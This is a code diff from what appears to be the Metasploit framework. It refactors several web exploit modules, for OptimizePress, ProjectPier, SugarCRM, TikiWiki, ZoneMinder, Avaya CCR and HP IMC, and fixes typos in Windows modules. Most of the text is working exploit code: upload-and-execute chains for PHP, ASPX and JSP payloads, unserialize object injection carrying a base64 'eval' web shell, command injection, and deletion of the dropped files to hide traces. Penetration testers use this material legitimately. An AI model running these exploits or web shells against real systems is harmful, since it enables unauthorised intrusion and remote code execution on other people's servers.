post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"")
print_status("#{peer} - Uploading PHP payload...")
n_data = post_data.to_s
n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
'data' => n_data,
'headers' => {
'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
end
print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
#get path to payload
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
payload_url = ""
if res.body =~ /name="cs_img" value="(.*#{filename}.*)" \/> <span/
payload_url =$1
else
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
end
begin
u = URI(payload_url)
rescue ::URI::InvalidURIError
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
end
register_files_for_cleanup(File::basename(u.path))
print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => u.path
})
end
end

10
modules/exploits/unix/webapp/projectpier_upload_exec.rb
View File

@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
if res and res.code == 404 if res and res.code == 404
print_error("#{@peer} - The upload most likely failed") print_error("#{peer} - The upload most likely failed")
return return
end end
@ -110,8 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")
@ -125,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload(:unlink_self=>true) p = get_write_exec_payload(:unlink_self=>true)
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
res = upload_php(base, php_fname, p, folder_name) res = upload_php(base, php_fname, p, folder_name)
if not res if not res
print_error("#{@peer} - No response from server") print_error("#{peer} - No response from server")
return return
end end
print_status("#{@peer} - Executing '#{php_fname}'...") print_status("#{peer} - Executing '#{php_fname}'...")
exec_php(base, res) exec_php(base, res)
end end
end end

21
modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
View File

@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
f = "pathCache.php" f = "pathCache.php"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Deleting #{f}") print_warning("#{peer} - Deleting #{f}")
client.fs.file.rm(f) client.fs.file.rm(f)
print_good("#{@peer} - #{f} removed to stay ninja") print_good("#{peer} - #{f} removed to stay ninja")
rescue rescue
print_error("#{@peer} - Unable to remove #{f}") print_error("#{peer} - Unable to remove #{f}")
end end
end end
end end
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME'] username = datastore['USERNAME']
password = datastore['PASSWORD'] password = datastore['PASSWORD']
@ -97,18 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"") print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return return
end end
if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
session_id = $1 session_id = $1
else else
print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)") print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
return return
end end
print_status("#{@peer} - Login successful with #{username}:#{password}") print_status("#{peer} - Login successful with #{username}:#{password}")
data = "module=Contacts&" data = "module=Contacts&"
data << "Contacts2_CONTACT_offset=1&" data << "Contacts2_CONTACT_offset=1&"
@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
print_status("#{@peer} - Exploiting the unserialize()") print_status("#{peer} - Exploiting the unserialize()")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -130,11 +129,11 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}") print_error("#{peer} - Exploit failed: #{res.code}")
return return
end end
print_status("#{@peer} - Executing the payload") print_status("#{peer} - Executing the payload")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -146,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res if res
print_error("#{@peer} - Payload execution failed: #{res.code}") print_error("#{peer} - Payload execution failed: #{res.code}")
return return
end end

19
modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
View File

@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter" if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Deleting #{@upload_php}") print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php) client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja") print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue rescue
print_error("#{@peer} - Unable to remove #{f}") print_error("#{peer} - Unable to remove #{f}")
end end
end end
end end
@ -79,9 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@upload_php = rand_text_alpha(rand(4) + 4) + ".php" @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem") print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(base, "tiki-rss_error.php") 'uri' => normalize_uri(base, "tiki-rss_error.php")
@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
return return
else else
tiki_path = $1 tiki_path = $1
print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}" print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
end end
php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
@ -106,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code") print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -118,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
return return
end end
print_status("#{@peer} - Executing the payload #{@upload_php}") print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -134,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res if res
print_error("#{@peer} - Payload execution failed: #{res.code}") print_error("#{peer} - Payload execution failed: #{res.code}")
return return
end end

18
modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
View File

@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
@ -109,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
command = Rex::Text.uri_encode(payload.encoded) command = Rex::Text.uri_encode(payload.encoded)
# login # login
print_status("#{@peer} - Authenticating as user '#{user}'") print_status("#{peer} - Authenticating as user '#{user}'")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -118,15 +116,15 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{data}", 'data' => "#{data}",
}) })
if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed") fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
print_good("#{@peer} - Authenticated successfully") print_good("#{peer} - Authenticated successfully")
# send payload # send payload
print_status("#{@peer} - Sending payload (#{command.length} bytes)") print_status("#{peer} - Sending payload (#{command.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -135,12 +133,12 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "#{cookie}" 'cookie' => "#{cookie}"
}) })
if res and res.code == 200 if res and res.code == 200
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
end end

2
modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", 'Name' => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on
the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to dereference arbitrary memory which easily leverages to arbitrary code execution. In order

2
modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
View File

@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit) # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Starndard 2010', {}], ['Windows XP SP3 with Office Standard 2010', {}],
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement 'DisclosureDate' => "Nov 5 2013", # Microsoft announcement

23
modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
View File

@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Removing #{@payload_path}") print_warning("#{peer} - Removing #{@payload_path}")
cli.fs.file.rm(@payload_path) cli.fs.file.rm(@payload_path)
print_good("#{@peer} - #{@payload_path} deleted") print_good("#{peer} - #{@payload_path} deleted")
rescue ::Exception => e rescue ::Exception => e
print_error("Unable to delete #{@payload_path}: #{e.message}") print_error("Unable to delete #{@payload_path}: #{e.message}")
end end
@ -73,9 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# Generate the ASPX containing the EXE containing the payload # Generate the ASPX containing the EXE containing the payload
exe = generate_payload_exe exe = generate_payload_exe
aspx = Msf::Util::EXE.to_exe_aspx(exe) aspx = Msf::Util::EXE.to_exe_aspx(exe)
@ -128,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
# UPLOAD # UPLOAD
# #
attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"
print_status("#{@peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => attack_url, 'uri' => attack_url,
@ -140,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "" payload_url = ""
@payload_path = "" @payload_path = ""
if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/
print_good("#{@peer} - Payload uploaded successfuly") print_good("#{peer} - Payload uploaded successfuly")
else else
print_error("#{@peer} - Payload upload failed") print_error("#{peer} - Payload upload failed")
return return
end end
@ -150,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
@payload_path = $1 @payload_path = $1
print_status("#{@peer} - Payload stored on #{@payload_path}") print_status("#{peer} - Payload stored on #{@payload_path}")
else else
print_error("#{@peer} - The payload file path couldn't be retrieved") print_error("#{peer} - The payload file path couldn't be retrieved")
end end
if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
payload_url = URI($1).path payload_url = URI($1).path
else else
print_error("#{@peer} - The payload URI couldn't be retrieved... Aborting!") print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!")
return return
end end
@ -166,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# EXECUTE # EXECUTE
# #
print_status("#{@peer} - Executing #{payload_url}...") print_status("#{peer} - Executing #{payload_url}...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => payload_url, 'uri' => payload_url,
@ -174,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 20) }, 20)
if (!res or (res and res.code != 200)) if (!res or (res and res.code != 200))
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]") print_error("#{peer} - Execution failed on #{payload_url} [No Response]")
return return
end end

10
modules/exploits/windows/http/hp_imc_mibfileupload.rb
View File

@ -68,8 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# New lines are handled on the vuln app and payload is corrupted # New lines are handled on the vuln app and payload is corrupted
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
@ -86,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = post_data.to_s data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
print_status("#{@peer} - Uploading the JSP payload...") print_status("#{peer} - Uploading the JSP payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
'method' => 'POST', 'method' => 'POST',
@ -96,13 +94,13 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.body.empty? if res and res.code == 200 and res.body.empty?
print_status("#{@peer} - JSP payload uploaded successfully") print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup(jsp_name) register_files_for_cleanup(jsp_name)
else else
fail_with(Failure::Unknown, "#{@peer} - JSP payload upload failed") fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end end
print_status("#{@peer} - Executing payload...") print_status("#{peer} - Executing payload...")
send_request_cgi({ send_request_cgi({
'uri' => normalize_uri(jsp_name), 'uri' => normalize_uri(jsp_name),
'method' => 'GET' 'method' => 'GET'

Some files were not shown because too many files have changed in this diff Show More